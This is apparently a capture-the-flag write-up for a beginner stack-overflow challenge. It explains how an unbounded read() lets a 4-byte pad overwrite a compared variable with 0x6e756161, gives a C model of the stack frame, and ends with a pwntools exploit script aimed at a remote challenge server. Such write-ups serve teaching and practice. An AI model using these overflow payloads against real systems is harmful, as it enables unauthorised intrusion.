File Download:
Links: https://pan.baidu.com/s/1Qp1fxOU8b4VobwSIouK7OQ
extraction code: g47i
0x01. Analysis
checksec:
64-bit binary, NX enabled.
Source:
The logic is very simple: a local variable is compared against a constant, and when they match a sub-function that prints the flag is called. The read() call before the comparison has no length check on the buffer, so it is an obvious stack overflow; the only task is to overwrite the variable that sits after the buffer with the expected value.
The two variables are 4 bytes apart, so the payload is 4 bytes of padding followed by the expected value (1853186401, i.e. 0x6e756161, packed little-endian). The overflow lands exactly on the compared variable, the sub-function runs, and it prints the flag.
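The layout and the payload described above, as an added example that is not the challenge binary or the write-up's own code. It models the frame as a struct (the field names, the 4-byte buffer size and the 32-bit width of the compared variable are assumptions), reimplements p64(), computes the padding with offsetof() instead of eyeballing it, feeds the payload through a bounded model of the vulnerable read(), and reports whether the overwritten variable passes the check:

```c
/* Added example (not the challenge binary): models the frame the write-up
 * describes, a 4-byte buffer followed by the variable compared against
 * 0x6e756161, and shows how 4*'A' + p64(value) lands on that variable.
 * The struct layout, field names and sizes are assumptions. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define TARGET_VALUE 0x6e756161u   /* 1853186401, the value the check expects */

/* Assumed frame layout: the compared variable sits 4 bytes past buf. */
struct frame {
    char buf[4];
    uint32_t compared;
};

/* Equivalent of pwntools p64(): little-endian encode a 64-bit value. */
static void p64(uint64_t v, unsigned char out[8]) {
    for (int i = 0; i < 8; i++)
        out[i] = (unsigned char)(v >> (8 * i));
}

/* Build the write-up's payload: `pad` bytes of filler, then p64(value).
 * Returns the payload length. */
static size_t build_payload(unsigned char *out, size_t pad, uint64_t value) {
    memset(out, 'A', pad);
    p64(value, out + pad);
    return pad + 8;
}

/* Model of the unbounded read(): bytes beyond buf[3] land on `compared`.
 * The copy is capped at the struct size so the model itself stays defined. */
static void vulnerable_read(struct frame *f, const unsigned char *in, size_t n) {
    memcpy(f, in, n > sizeof *f ? sizeof *f : n);
}

/* Model of the comparison guarding the flag sub-function. */
static int check(const struct frame *f) {
    return f->compared == TARGET_VALUE;
}

/* Returns byte i of the payload the exploit sends (-1 past the end). */
int payload_byte(size_t i) {
    unsigned char payload[64];
    size_t len = build_payload(payload, 4, TARGET_VALUE);
    return i < len ? payload[i] : -1;
}

/* Runs the whole sequence; returns 1 when the overwrite passes the check. */
int exploit_model(void) {
    struct frame f = { {0}, 0 };
    unsigned char payload[64];
    /* padding = distance from buffer start to the compared variable (4) */
    size_t pad = offsetof(struct frame, compared) - offsetof(struct frame, buf);
    size_t len = build_payload(payload, pad, TARGET_VALUE);
    vulnerable_read(&f, payload, len);
    return check(&f);
}

int main(void) {
    printf("offset to compared variable: %zu\n", offsetof(struct frame, compared));
    printf("check passes after overflow: %d\n", exploit_model());
    return 0;
}
```

Note that p64() of a 32-bit constant emits four trailing zero bytes; they spill past the compared variable in the real frame, which is harmless here only because nothing the program still uses lives immediately after it. On a target where something does, the value should be packed with p32() instead.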
0x02. exp
#!/usr/bin/env python
from pwn import *

r = remote("111.198.29.45", 44362)
# r = process('./hellopwn')   # local test

# 4 bytes of padding reach the compared variable, then its expected
# value 1853186401 (0x6e756161), packed little-endian.
payload = b'A' * 4 + p64(1853186401)
r.recvuntil(b"bof")
r.sendline(payload)
r.interactive()